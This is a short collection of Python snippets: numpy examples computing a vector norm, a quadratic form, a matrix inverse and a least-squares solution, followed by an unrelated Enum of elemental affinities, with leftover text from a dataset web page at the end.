x = np.array([[1], [0], [-1]])
x_norm = np.linalg.norm(x)
print(x_norm)

# Python code to compute the weighted norm x^T W x
W = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
x = np.array([[2], [-1], [1]])
z = np.dot(x.T, np.dot(W, x))
print(z)

# Python code to compute a matrix inverse (of X^T X)
X = np.array([[1, 3], [-2, 7], [0, 1]])
XtX = np.dot(X.T, X)
XtXinv = np.linalg.inv(XtX)
print(XtXinv)

# Python code to solve X beta = y (least squares)
X = np.array([[1, 3], [-2, 7], [0, 1]])
y = np.array([[2], [1], [0]])
beta = np.linalg.lstsq(X, y, rcond=None)[0]
print(beta)
from enum import Enum
class Element(Enum):
    """Closed set of elemental affinities.

    Values are the lowercase member names — presumably used as serialized /
    wire identifiers; confirm against the callers that consume .value.
    """
    WATER = "water"
    EARTH = "earth"
    FIRE = "fire"
    LIGHT = "light"
    DARK = "dark"
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.